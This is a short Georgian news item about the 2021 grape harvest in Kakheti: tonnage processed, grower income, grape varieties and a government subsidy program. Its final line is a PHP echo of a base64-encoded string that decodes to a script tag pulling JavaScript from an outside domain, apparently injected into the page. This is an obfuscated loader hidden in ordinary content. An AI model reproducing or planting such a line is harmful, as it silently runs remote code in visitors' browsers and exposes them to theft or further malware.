celsiusi
ავერსი საქკაბელი
17 სექტემბრის მონაცემებით, კახეთში 130 ათას ტონამდე ყურძენია გადამუშავებული, რაც საპროგნოზო მოსავლის დაახლოებით 50%-ია და 2-ჯერ მეტია გასული წლის ანალოგიური პერიოდის მაჩვენებელზე.
 
როგორც ღვინის ეროვნული სააგენტოს მიერ გავრცელებულ ინფორმაციაშია აღნიშნული, კახეთში, 13 ათასამდე მევენახემ ყურძნის რეალიზაციით  120 მლნ ლარამდე შემოსავალი უკვე მიიღო.
 
გადამუშავებული ყურძნიდან 75 ათას ტონამდე რქაწითელია, 46 ათას ტონამდე საფერავი, 3 ათას ტონამდე კახური მწვანე, დანარჩენი სხვადასხვა ჯიშის ყურძენია.
 
ყურძნის გადამუშავების პროცესში რთველის დაწყებიდან დღემდე 170-მდე დიდი, მცირე და საშუალო ღვინის საწარმო იყო ჩართული. საქართველოს მთავრობის გადაწყვეტილებით, 2021 წლის რთველის მხარდასაჭერად, სუბსიდირების პროგრამა მოქმდებს. 
პროგრამის მიზანია, პანდემიით გამოწვეული ვითარება უარყოფითად არ აისახოს მევენახე ფერმერებზე და ღვინის მწარმოებლებზე, სრულად დაბინავდეს ყურძნის მოსავალი.
 
1090
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");